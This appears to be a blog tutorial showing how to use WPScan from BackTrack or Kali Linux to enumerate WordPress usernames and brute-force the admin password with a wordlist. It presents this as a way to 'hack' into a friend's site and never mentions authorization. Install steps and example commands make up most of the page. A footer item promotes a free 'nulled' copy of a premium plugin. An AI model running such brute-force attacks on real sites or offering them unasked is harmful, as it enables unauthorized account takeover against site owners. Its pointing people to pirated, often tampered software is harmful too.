Home / Wordpress / How to hack wordpress website by linux?

How to hack wordpress website by linux?

WPScan.rb is a nifty bit of program that allows you to scan WordPress sites for information as well as do some fun stuff.Say for example you want to “hack” into your friends WordPress site :-)…or just get some information, whatever.

I’m using BackTrack 5 r3 for this tutorial but you can use kali linux for this they are similar


Step1: You can use it to enumerate usernames, so you can see what usernames are valid on the WordPress site by running this command:


ruby ./wpscan.rb –url www.friends-site.com –enumerate u

2 (1)


Running this command against a real WordPress site will show something like this: 

2
Step2:

Now that you know what the usernames are, you can then try to brute force it with a list of passwords. This process takes a while, and you have to have a word list. BackTrack 5 r3 comes with a decent word list, so I’ll use that in this example.


ruby ./wpscan.rb –url www.friends-site.com –wordlist /pentest/passwords/wordlists/darkc0de.lst –username admin


The above command is telling WPScan to attack your friends URL, using the username “admin” with the word list that is located in the /pentest/passwords/wordlists/ folder of Back Track 5.

You can even add threading to make the process a little faster by using this switch: –threads 50

There are a few more things you can do, including scanning for what plugins the site uses, as well as telling you which ones are vulnerable.

Happy WordPress Hacking!!

or

How to Install WPScan?

Before you install WPScan, you have to install number of dependencies essential by this tiny ruby application. BTW i am using BackTrack5 Linux.

Dependencies :

apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus

WPScan Installation :

cd /pentest/web/
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
cd wpscan

How to use WPScan?

It is almost cooked. One more thing we need here; is to download keywords database which will be used for brute forcing.

wget http://static.hackersgarage.com/darkc0de.lst.gz
gunzip darkc0de.lst.gz

Example usage of this ant application :

Do ‘non-intrusive’ checks…

ruby ./wpscan.rb --url www.hackersgarage.com

Do wordlist password brute force on enumerated users using 50 threads…

ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the ‘admin’ username only…

ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin

Generate a new ‘most popular’ plugin list, up to 150 pages…

ruby ./wpscan.rb --generate_plugin_list 150

Enumerate instaled plugins…

ruby ./wpscan.rb --enumerate p

About admin

Check Also

UserPro v4.9.15 – User Profiles with Social Login

Download Free UserPro WordPress Plugin 4.9.15 WordPress Plugin Nulled – CodeCanyon |  UserPro v4.9.15 – User Profiles with Social Login version 4.9.15 (Updated on 11th September 2017) offers an out standing and beautiful login, front-end profiles and great registration for WordPress. UserPro is also packed with lots of  many premium features and easy to control options. It is undoubtedly […] Do you need any custome Development Click here and fill your requirement...

Leave a Reply

Your email address will not be published. Required fields are marked *